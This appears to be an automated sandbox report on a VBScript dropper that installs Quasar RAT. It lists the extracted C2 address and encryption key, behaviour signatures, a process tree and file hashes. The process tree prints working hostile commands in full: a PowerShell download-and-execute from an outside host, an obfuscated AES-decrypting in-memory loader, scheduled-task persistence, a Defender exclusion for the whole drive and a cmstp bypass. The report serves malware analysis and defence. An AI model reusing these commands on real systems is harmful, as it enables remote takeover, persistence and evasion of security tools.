Analysis

  • max time kernel
    95s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09-12-2024 17:28

General

  • Target

    9273_output.vbs

  • Size

    1.6MB

  • MD5

    89444730511dcc04894433ad215e9f02

  • SHA1

    8af2c8469f0381666bbdfbb12965c48290ef817b

  • SHA256

    7bfbcbf1a30ba537264e189e39b2ada434fc451c99a7fe680aa6196cd931b625

  • SHA512

    121bcab2c0e4c0c307565742f03d4ebef33ba677f4591a2d95238c500c82fbeafd4d52521bdf57e0775178b081a95b877b561721ec72540b0beb4acf3548a19f

  • SSDEEP

    24576:prCPrx+7wnggpUvK3oVj1S1LYuhN0E7olLXm5ttA7AhazaJUelDBY1Qq0+BbUklh:g/rUTV40u3oli5LEgaaUKat0+BbeYz

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

searchindexer

C2

87.120.113.125:55644

Mutex

0c021db0-bf71-4ae4-b9ae-2671afdea591

Attributes
  • encryption_key

    54717FCDBD30C7781F669403FBC8E35733C37E34

  • install_name

    searchindexer.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    searchindexer

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open-source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Uses the powershell.exe command.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely as a geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9273_output.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2064
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2932
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wiobhgbz\wiobhgbz.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4816
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA93.tmp" "c:\Users\Admin\AppData\Local\Temp\wiobhgbz\CSCC1978987AE194A629643B7EBA38634B8.TMP"
            5⤵
              PID:3148
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\rtmqsq0h.inf
            4⤵
              PID:1736
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:60
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3900
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_122_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\latencyx122.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4060
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\latencyx122.vbs"
              4⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:3068
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\latencyx122.bat" "
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4832
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Roaming\latencyx122.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:4364
                  • C:\Windows\SYSTEM32\schtasks.exe
                    "schtasks" /create /tn "searchindexer" /sc ONLOGON /tr "C:\Program Files\SubDir\searchindexer.exe" /rl HIGHEST /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4580
                  • C:\Program Files\SubDir\searchindexer.exe
                    "C:\Program Files\SubDir\searchindexer.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3480
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2024
  • C:\Windows\system32\taskkill.exe
    taskkill /IM cmstp.exe /F
    1⤵
    • Kills process with taskkill
    • Suspicious use of AdjustPrivilegeToken
    PID:3392

MITRE ATT&CK Enterprise v15

Downloads

      • C:\Program Files\SubDir\searchindexer.exe

        Filesize

        442KB

        MD5

        04029e121a0cfa5991749937dd22a1d9

        SHA1

        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

        SHA256

        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

        SHA512

        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        bf0eda50972f08c8b9d8c9cb5ce7d0c2

        SHA1

        2d8fb14d729b8afe30b4dd3d83d9dfa50afd5dab

        SHA256

        58507df56c947895b91930c001aa1e917c7bd33cf813ec203487735195c545e1

        SHA512

        4acafe573b1ef9063ef434e44f72ba3e69d8b39834c13a11fc3c240cacfae71e45634829e31c1669ce842e2f7de0b11a4076142bcd3f185d6db5c67bbd64c2fb

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        c4aa2db9bf8394c9fd7a89374c873658

        SHA1

        bb0bb7955db4ffa413012b62f673ac942f27e852

        SHA256

        eb997eddab899d4f7547c0d3d9a807f7a1f5da92d10a818b256d793617c0cd92

        SHA512

        c61415d0d81cdbbf0172dc02f4dd24ee1cd0e654e42e1cecf60ddb9a38e919ac7a3a3aa03cad65c12d97847cdfb5b39099f80c4277906a861217e56d01681628

      • C:\Users\Admin\AppData\Local\Temp\RESCA93.tmp

        Filesize

        1KB

        MD5

        a9e958a3e986a92fd9edcd8c1637ea9b

        SHA1

        077a92e39f2a3015cc48d0070582e0ee0ccc718d

        SHA256

        81b301fa37bf7b0104a7ae10abb01a630f38adc27fc27472a9891b6d9e870857

        SHA512

        561200907efd4ab4f010228859be4493f27d37a6186a4f8ab79845574cd17d5b61b43b385311496fbfdccb1d7607a953aee98c91bdc81923701c1a7bf0aaca34

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4lec4lr.az4.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\c.bat

        Filesize

        1.6MB

        MD5

        63a0d558702bb4b4fdad3fbe2ffc0ac9

        SHA1

        c70f2444e8052e6495c42f179785da267acac50b

        SHA256

        c3c8a913470c637c51bc84cdaaf8eb23f52556ad289d57c79e9c9cfa7bf9f757

        SHA512

        7f7819c86ac7a74694dc77b21cb54ccbfc084d98554d880323ba460dc033492718f052041f001837c5412af52aa0c29a8a30125f8413276201643d516e052f10

      • C:\Users\Admin\AppData\Local\Temp\wiobhgbz\wiobhgbz.dll

        Filesize

        4KB

        MD5

        d2c22f029feb022eaae6cba32f74b844

        SHA1

        e968c151ef2a36264531b075873b8daf197df45b

        SHA256

        b02fe52358f2f0e5ed918eac44cb8597631a98345a8c43830dfb003366f77325

        SHA512

        48556e5551fbf92373e5e400ea9007f81415be64798f01bd6b86246a17d892ee0a9a808816b4a125b2d52c6863ad4c024fa5b6def6e91d956e98814c782b02f7

      • C:\Users\Admin\AppData\Roaming\latencyx122.vbs

        Filesize

        111B

        MD5

        b5f84a2a90df4f61706bbc6cc2de6024

        SHA1

        bcfa4cf369c51e9d0092d8892b06fd890c83d758

        SHA256

        a574a59174d2b2445c3ab8ff1b2319911008623ecf165d6d80ddfb9b8d997986

        SHA512

        202f99975ba293dc19af0edcbacc821ed1b145daf7b4b59e99bd0a95da76b5958df1837d3e1dec381aec99500cb5d2881a819e83f12372fd2271ecd69a2d55ce

      • C:\windows\temp\rtmqsq0h.inf

        Filesize

        683B

        MD5

        a4fd12b94ad4ac06fabd8dd56dd5ff2b

        SHA1

        940d129205e04ba31b10a72d7a7a236a9ed0488b

        SHA256

        fe9977d49d2ae366779da959a5c9a6cc7664bc82d7c8e243f1baa9aa539cd320

        SHA512

        a4712ad7a23ab7a1eadfdaa7dc73dc406a0a14313c0413561f2f4ba8087c79c504d1d4391585b1b91f580ffef3869a37523707979dd5ab870a596062497e79fe

      • \??\c:\Users\Admin\AppData\Local\Temp\wiobhgbz\CSCC1978987AE194A629643B7EBA38634B8.TMP

        Filesize

        652B

        MD5

        a801a5894d4eceda79d65d2f2e1320b5

        SHA1

        20f6a1c4fadd05559d9cb0485be97a0242232a0c

        SHA256

        cc3c1fd6330d257f5c054327ca0d1dda29bf7ce40814b6ef6bd58527df33dc92

        SHA512

        46e97d27530a89a73aec58125026ebf3dedfba085b93911f7ff7ceb08e531bc6d7d48d1e86c137e05b6d2f233b03f1d2cb2a9016242bb105c06bf65d94d236e6

      • \??\c:\Users\Admin\AppData\Local\Temp\wiobhgbz\wiobhgbz.0.cs

        Filesize

        2KB

        MD5

        897ac4306f2a2524bc3c441bd00c72b9

        SHA1

        1703dbf9a2a78491dfd6685540d4691839e33b69

        SHA256

        a889dd1616631e369d253d6d89cc3a253b663e636bb1cdebbf831817592b405b

        SHA512

        2eba96a7960fe4c8c083ffbca30dbff4c5aac6acfa2c99b6ab5802376d028cbf471c3f06fcef9a3a0129dc988df1aceba808c3436cd110c123dc2ba1147c81b6

      • \??\c:\Users\Admin\AppData\Local\Temp\wiobhgbz\wiobhgbz.cmdline

        Filesize

        369B

        MD5

        d1b1e1dfc36b17f2f9c33c9bd92581c3

        SHA1

        ebff24ca65cff19330ec496adfa9048c260e2985

        SHA256

        4ad70d5f3e8683b10a667f3c5a2d862678e7cf5a114ccbf740f78f2b3ad7caae

        SHA512

        8e94bfe606485333420fdaad7faa763be4985ebaa66504121b0907abf0434527a5764955cc9a1631ab553a04dcc12da1de692f309ae8061cab3a71287daae81a

      • memory/2932-13-0x0000017F710E0000-0x0000017F710FC000-memory.dmp

        Filesize

        112KB

      • memory/2932-1-0x0000017F70C40000-0x0000017F70C62000-memory.dmp

        Filesize

        136KB

      • memory/2932-43-0x00007FF8221A3000-0x00007FF8221A5000-memory.dmp

        Filesize

        8KB

      • memory/2932-0-0x00007FF8221A3000-0x00007FF8221A5000-memory.dmp

        Filesize

        8KB

      • memory/2932-48-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

        Filesize

        10.8MB

      • memory/2932-26-0x0000017F71150000-0x0000017F71158000-memory.dmp

        Filesize

        32KB

      • memory/2932-44-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

        Filesize

        10.8MB

      • memory/2932-12-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

        Filesize

        10.8MB

      • memory/2932-11-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

        Filesize

        10.8MB

      • memory/3480-109-0x000001D2BA510000-0x000001D2BA586000-memory.dmp

        Filesize

        472KB

      • memory/3480-108-0x000001D2BA100000-0x000001D2BA144000-memory.dmp

        Filesize

        272KB

      • memory/3900-64-0x000002E29BEB0000-0x000002E29BFE2000-memory.dmp

        Filesize

        1.2MB

      • memory/3900-63-0x000002E281900000-0x000002E281908000-memory.dmp

        Filesize

        32KB

      • memory/4364-93-0x00000131D6F80000-0x00000131D72A4000-memory.dmp

        Filesize

        3.1MB